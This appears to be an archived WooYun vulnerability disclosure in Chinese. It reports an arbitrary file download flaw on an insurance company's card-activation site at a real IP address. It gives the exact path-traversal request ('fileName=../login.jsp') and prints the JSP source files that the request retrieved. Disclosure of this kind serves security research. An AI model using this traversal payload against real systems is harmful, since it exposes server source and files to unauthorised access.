乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-22: 细节已通知厂商并且等待厂商处理中 2015-09-27: 厂商已经主动忽略漏洞,细节向公众公开
任意文件下载
http://1.85.2.249/online/web/sale/card/login.jsp
看到有一处点了 会下载PDF文件http://1.85.2.249/online/sale/card/downloadPage.do?fileName=190.pdf果断替换后面的先现在index.jsp测试下 我用的火狐测试
<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%><%@ taglib prefix="s" uri="/struts-tags"%><%String path = request.getContextPath();String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";%><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> <head> <base href="<%=basePath%>"> <title>JasperReport事例</title> <meta http-equiv="pragma" content="no-cache"> <meta http-equiv="cache-control" content="no-cache"> <meta http-equiv="expires" content="0"> <meta http-equiv="keywords" content="keyword1,keyword2,keyword3"> <meta http-equiv="description" content="This is my page"> <!-- <link rel="stylesheet" type="text/css" href="styles.css"> --> </head> <body> <s:form action="iReport.action"> 报表格式: <s:select name="formatType" list="#{'HTML':'HTML','PDF':'PDF','XLS':'XLS','RTF':'RTF'}"></s:select> <s:submit value="确定"/> </s:form> <s:form action="iReport2.action"> <s:submit value="下载"/> </s:form> <s:form action="toPrint.action"> <s:submit value="打印"/> </s:form> </body></html>
在下载一个http://1.85.2.249/online/web/sale/card/login.jsp的login.jsphttp://1.85.2.249/online/sale/card/downloadPage.do?fileName=../login.jsp
login.jsp
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%><%@ include file="/common/taglibs.jsp" %><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <title>永安保险</title> <link href="${ctx }/css/common/formCheck.css" type="text/css" rel="stylesheet" /> <link href="${ctx }/css/cssCard/master.css" type="text/css" rel="stylesheet"/> <script type="text/javascript" src="${ctx}/js/jquery-1.6.2.min.js"></script> <script type="text/javascript" src="${ctx }/web/sale/card/js/common.js"></script> <script type="text/javascript" src="${ctx }/js/checkform/formCheck.validation.js"></script> <script type="text/javascript" src="${ctx }/js/checkform/formCheck.extend.js"></script> <script type="text/javascript" src="${ctx }/js/trimForm.js"></script> <script type="text/javascript" src="${ctx}/js/public/common.js"></script> <script><%-- google web Analytics--%> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-49712039-1', '1.85.2.249'); ga('send', 'pageview');</script></head><%@ include file="/common/service/messageLayer.jsp"%><body class="body_bg"><input id="cardmsg" type="hidden" value="${errormsg }"/><div class="index_bg"> <div id="header"> <div class="top"> </div> <div class="logo"><a href="#" title="永安保险"><img src="${ctx }/images/imagesCard/logo.gif" width="321" height="48" alt="永安保险"/></a></div> <div class="clear"></div> </div> <div id="content"> <div class="insure_left"> <div class="l"> <img width="240" height="60" src="${ctx }/images/imagesCard/cardServices.gif"> </div> <div class="l margT10 margB10"> <img width="240" height="37" src="${ctx }/images/imagesCard/activeOnline.gif"> </div> <%@ include file="/web/sale/card/common/menu.jsp" %> </div> <div class="insure_right"> <span class="bg_1"></span> <div class="auto_fast"> <h2>您现在的位置:保险卡 > 保险卡激活</h2> <div class="clear"></div> <div class="auto_vehicle"> <dl> <dt><span>请输入您的卡号及密码</span></dt> </dl> <div class="info"> <form id="subFm" action="${ctx }/sale/card/login.do" method="post"> <ul> <li></li> <li><label><b class="col_e83">*</b>卡 号</label><input id="quoteNo" name="geQuoteMain.cardNo" type="text" class="input_text" bind="focus" tipmsg="请输入卡号" tipid="quoteNo_tip" trim cType="notEmpty|myRule" errmsg="不允许为空|格式不正确"/> <span id="quoteNo_tip" style="position: absolute;"></span> </li> <li><label><b class="col_e83">*</b>密 码</label><input id="pwd" name="geQuoteMain.flag" type="password" class="input_text" bind="focus" tipmsg="请输入密码" tipid="pwd_tip" trim cType="notEmpty|regexp" regexp="^[0-9]{1,10}$" errmsg="不允许为空|格式不正确"/> <span id="pwd_tip" style="position: absolute;"></span> </li> <li style="position: relative;"><label>验证码</label><input class="input_check" type="text" name="input" id="rand"> <a href="javascript:changeImage();"><img id="randImge" src="${ctx }/CreateImage" style="position:absolute;left: 335px;top:0"/></a> <span id="rand_tip" tipresult="false" style="position: absolute;left:380px"></span> </li> </ul> <div class="button_login"> <a href="javascript:subForm();" class="vip_login"> </a></div><div class="clear"></div> </form> </div> <div class="active_steps_wrap">● 激活流程 <div class="active_steps"> <dl> 1.输入保险卡卡号及密码</dl> <span class="l" style="font-weight: normal;padding-top: 12px">></span> <dl>2.阅读“投保说明”</dl> <span class="l" style="font-weight: normal;padding-top: 12px">></span> <dl>3.填写激活信息</dl><span class="arrow"> </span> <div class="clear"></div> <dl>6.下载电子保单</dl> <span class="l" style="font-weight: normal;padding-top: 12px"><</span> <dl>5.激活成功</dl> <span class="l" style="font-weight: normal;padding-top: 12px"><</span> <dl>4.保单信息确认</dl> <div class="clear"></div> </div> <div class="clear"></div> </div> </div> <br> <div> <dl> <dt> <span style="color:#FF6600"> 提示:尊敬的客户,为了使您在激活流程中获得较好的体验,请使用IE高版本及其他主流浏览器。 </span> </dt> </dl> </div> </div> <span class="bg_2"></span> </div> <div class="clear"></div> <%@include file="/web/sale/card/common/foot.jsp" %> </div> <div id="footer">版权所有 © 永安财产保险股份有限公司</div></div></body><script type="text/javascript">$(function(){ var errormsg = $("#cardmsg").val(); if(errormsg != null && errormsg != ''){ showError(errormsg); }})var check = new SFEC();$(document).ready(function(){ check.setForm("subFm"); check.addRule('myRule',function(obj){ return /[0-9]{1,12}/.test($(obj).val()); }); check.start();});function changeImage(){ $("#randImge").attr("src","${ctx}/CreateImage?"+ Math.random());}/**ajax验证验证码**/function checkCode() { var dataFlag = false; $.ajax({ type : "POST", async : false, url : '${ctx}/sale/card/checkAjax.do?temp='+new Date().getTime(), dataType : 'text', data : {checkCode : $("#rand").val()}, success : function(data){ if($.trim(data) == "success") { dataFlag = true; } else { dataFlag = false; } } }); return dataFlag;}function subForm(){ if(check.result(true)){ if(checkCode()){ //提交表单 $("#subFm").submit(); }else{ //验证码错误 $("#rand_tip").text("验证码输入错误"); changeImage(); $("#rand").val(""); } }}</script></body></html>
白名单
危害等级:无影响厂商忽略
忽略时间:2015-09-27 11:06
漏洞Rank:15 (WooYun评价)
暂无